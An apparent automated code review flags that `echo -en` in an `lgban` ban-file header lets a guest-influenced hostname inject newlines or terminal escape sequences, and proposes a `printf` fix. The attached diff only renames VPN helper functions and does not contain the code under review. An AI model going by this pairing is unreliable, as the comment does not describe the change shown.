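Review bot: The new ban-file header in `lgban` is written with `echo -en`, which expands backslash escapes not only in the colour variables but also in `${hn}` and in the operator-supplied `$msg`, so a hostname containing `\n` or an escape sequence is interpreted when the file is written and again wherever it is displayed. The hostname is read from `${_self_for_guest_dir}/${lglid}/hostname`; the directory name suggests it is at least shared with the guest, though whether the guest can influence its content I cannot tell from here. Keep escape interpretation to the format string only: `printf "# ${CY}%s ${CDY}%s %s %s${CN}\n%b" "${hn:-NAME}" "${_sf_region:-REGION}" "${lglid}" "${ip:0:18}" "$msg" >"${fn}"`. `%b` preserves the existing `$*\n` handling for `msg`.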
|
||||
@ -6,7 +6,7 @@
|
|||
|
||||
[[ -z "$SF_GUEST_MTU" ]] && SF_GUEST_MTU=$((SF_HOST_MTU - 80))
|
||||
|
||||
cmd_vpn_help() {
|
||||
cmd_ovpn_help() {
|
||||
echo -en "\
|
||||
Use ${C}curl sf/vpn/up -d config=\"\$(pwd)/openvpn.conf\"${N}
|
||||
Use ${C}curl sf/vpn/up -d config=\"\$(pwd)/openvpn.conf\" -d user=username -d pass=password${N}
|
||||
|
@ -241,7 +241,7 @@ vpn_stop() {
|
|||
nsenter.u1000 --setuid 0 --setgid 0 -t "${PID}" -n iptables -F FORWARD 2>/dev/null
|
||||
}
|
||||
|
||||
cmd_vpn_show() {
|
||||
cmd_ovpn_show() {
|
||||
load_lg
|
||||
[[ -f "/tmp/lg-${LID:-?}/conf/conn.ovpn" ]] && {
|
||||
echo -e "${C}"
|
||||
|
@ -252,12 +252,12 @@ cmd_vpn_show() {
|
|||
exit
|
||||
}
|
||||
|
||||
cmd_vpn_up() {
|
||||
cmd_ovpn_up() {
|
||||
local str
|
||||
load_lg
|
||||
local link_mtu
|
||||
|
||||
[[ -z "$R_CONFIG" ]] && cmd_vpn_help
|
||||
[[ -z "$R_CONFIG" ]] && cmd_ovpn_help
|
||||
WG_DEV="vpnEXIT"
|
||||
# echo "PID=$PID"
|
||||
|
||||
|
@ -379,7 +379,7 @@ Use ${C}curl sf/vpn/down${N} to disconnect.
|
|||
exit
|
||||
}
|
||||
|
||||
cmd_vpn_del() {
|
||||
cmd_ovpn_del() {
|
||||
load_lg
|
||||
|
||||
vpn_stop
|